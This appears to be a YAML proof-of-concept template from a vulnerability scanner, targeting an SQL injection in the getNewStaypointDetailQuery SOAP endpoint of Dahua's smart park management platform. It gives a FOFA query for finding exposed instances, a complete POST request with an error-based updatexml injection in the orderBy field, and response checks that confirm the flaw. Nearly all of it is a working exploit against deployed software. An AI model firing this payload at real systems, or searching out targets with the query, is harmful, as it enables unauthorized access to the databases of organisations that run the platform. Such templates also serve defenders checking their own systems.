product: 大华智慧园区综合管理平台
vName: 智慧园区综合管理平台getNewStaypointDetailQuery SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 大华智慧园区综合管理平台是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。portal/services/clientServer存在SQL注入。
version: ''
note: ''
search:
  FOFA: app="dahua-智慧园区综合管理平台"
protocol: http
link: https://cloud.tencent.com/developer/article/2396481
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /portal/services/carQuery/getNewStaypointDetailQuery
      header:
        Content-Type: text/xml;charset=UTF-8
      data: '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<car:getNewStaypointDetailQuery>
<!--type: string-->
<searchJson>{}</searchJson>
<!--type: string-->
<pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,md5(123456),0x7e),1)--"}</pageJson>
<!--type: string-->
<extend>quae divum incedo</extend>
</car:getNewStaypointDetailQuery>
</soapenv:Body>
</soapenv:Envelope>'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
              - XPATH syntax error
            logic: and